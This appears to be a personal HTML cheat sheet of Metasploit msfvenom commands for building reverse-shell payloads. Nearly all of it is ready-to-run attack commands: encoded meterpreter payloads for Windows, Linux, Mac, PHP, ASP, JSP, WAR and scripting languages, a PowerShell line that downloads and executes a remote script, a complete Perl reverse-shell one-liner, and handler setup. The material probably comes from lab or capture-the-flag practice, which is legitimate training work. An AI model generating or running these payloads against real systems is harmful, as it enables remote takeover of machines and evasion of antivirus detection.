<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Metasploit - Reverse_Shells</title>
</head><body><br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Creating Metasploit Payloads</span></span><br/>
<br/>
msfvenom -l<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Binaries<br/>
<br/>
Powershell<br/>
<br/>
</span><span style="font-size: 10pt">msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.10.14.7:80/chatterbox.ps1')\""</span><span style="color: #ff0000"><br/>
</span><span style="color: #ff0000"><br/>
Raspberry Pi Shells<br/>
<br/>
</span></span>msfvenom -p linux/armle/meterpreter_reverse_https LHOST=192.168.0.31 LPORT=8443<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Linux</span></span><br/>
<br/>
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f elf &gt; shell.elf <br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Windows</span></span><br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f exe &gt; shell.exe<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Mac</span></span><br/>
<br/>
msfvenom -p osx/x86/shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f macho &gt; shell.macho<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Web Payloads</span></span><br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">PHP</span></span><br/>
<br/>
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.30.53 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f raw &gt; shell.php<br/>
cat shell.php | pbcopy &amp;&amp; echo '&lt;?php ' | tr -d '\n' &gt; shell.php &amp;&amp; pbpaste &gt;&gt; shell.php<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">ASP</span></span><br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -b "\x00" -e x86/shikata_ga_nai -f asp &gt; shell.asp<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">JSP</span></span><br/>
<br/>
msfvenom -p java/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -b "\x00" -e x86/shikata_ga_nai -f raw &gt; shell.jsp<br/>
<br/>
<span style="color: #ff0000"><span style="font-size: 14pt">WAR</span></span><br/>
<br/>
msfvenom -p java/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -b "\x00" -e x86/shikata_ga_nai -f war &gt; shell.war<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Scripting Payloads</span></span><br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Python<br/>
</span></span><br/>
msfvenom -p cmd/unix/reverse_python LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -b "\x00" -e x86/shikata_ga_nai -f raw &gt; shell.py<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Bash</span></span><br/>
<br/>
msfvenom -p cmd/unix/reverse_bash LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -b "\x00" -e x86/shikata_ga_nai -f raw &gt; shell.sh<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Perl</span></span><br/>
<br/>
msfvenom -p cmd/unix/reverse_perl LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -b "\x00" -e x86/shikata_ga_nai -f raw &gt; shell.pl<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Shellcode</span></span><br/>
<br/>
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Linux Based Shellcode</span></span><br/>
<br/>
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -b "\x00" -e x86/shikata_ga_nai -f &lt;language&gt;<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Windows Based Shellcode</span></span><br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -b "\x00" -e x86/shikata_ga_nai -f &lt;language&gt;<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Mac Based Shellcode</span></span><br/>
<br/>
msfvenom -p osx/x86/shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -b "\x00" -e x86/shikata_ga_nai -f &lt;language&gt;<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">Handlers</span></span><br/>
<br/>
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.<br/>
<br/>
use exploit/multi/handler<br/>
set PAYLOAD &lt;Payload name&gt;<br/>
set LHOST &lt;LHOST value&gt;<br/>
set LPORT &lt;LPORT value&gt;<br/>
set ExitOnSession false<br/>
exploit -j -z<br/>
<br/>
<br/>
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe<br/>
<br/>
<br/>
Perl one liner<br/>
<br/>
perl -e 'use Socket;$i="192.168.139.100";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'<br/>
<br/>
--------------------------------------------------<br/>
<br/>
actual shells made<br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.53 LPORT=443 -f asp &gt; Desktop/shells/win-rev-met-443-shell.asp<br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.53 LPORT=4444 -f exe &gt; Desktop/shells/win-rev-met-4444-shell.exe<br/>
<br/>
<br/>
<br/>
<span style="color: #0a0a0a"><b><span style="font-family: Arial"><span style="font-size: 10pt">Staged Payloads &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Stageless Payloads<br/>
<br/>
</span></span></b></span><span style="font-family: Arial"><span style="font-size: 10pt"><span style="color: #55585a">windows/meterpreter/reverse_tcp</span></span></span>&nbsp; &nbsp;&#09;&#09;&#09; &nbsp; &nbsp; &nbsp;<span style="color: #55585a"><span style="font-family: Arial"><span style="font-size: 10pt">windows/meterpreter_reverse_tcp</span></span></span>&nbsp; &nbsp;<br/>
<br/>
<span style="font-size: 10pt"><span style="font-family: Arial"><span style="color: #55585a">windows/meterpreter/reverse_https</span></span></span>&nbsp; &nbsp;&#09;&#09;&#09; &nbsp; &nbsp; &nbsp;<span style="font-size: 10pt"><span style="font-family: Arial"><span style="color: #55585a">windows/meterpreter_reverse_https</span></span></span>&nbsp; <br/>
<br/>
<span style="font-size: 10pt"><span style="font-family: Arial"><span style="color: #55585a">windows/meterpreter/reverse_tcp</span></span></span>&nbsp; &nbsp;&#09;&#09;&#09; &nbsp; &nbsp; &nbsp;<span style="font-size: 10pt"><span style="font-family: Arial"><span style="color: #55585a">windows/meterpreter_reverse_tcp</span></span></span>&nbsp; <br/>
<br/>
<br/>
msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.0.16 LPORT=8443 -f psh &gt; test.ps1<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
</body></html>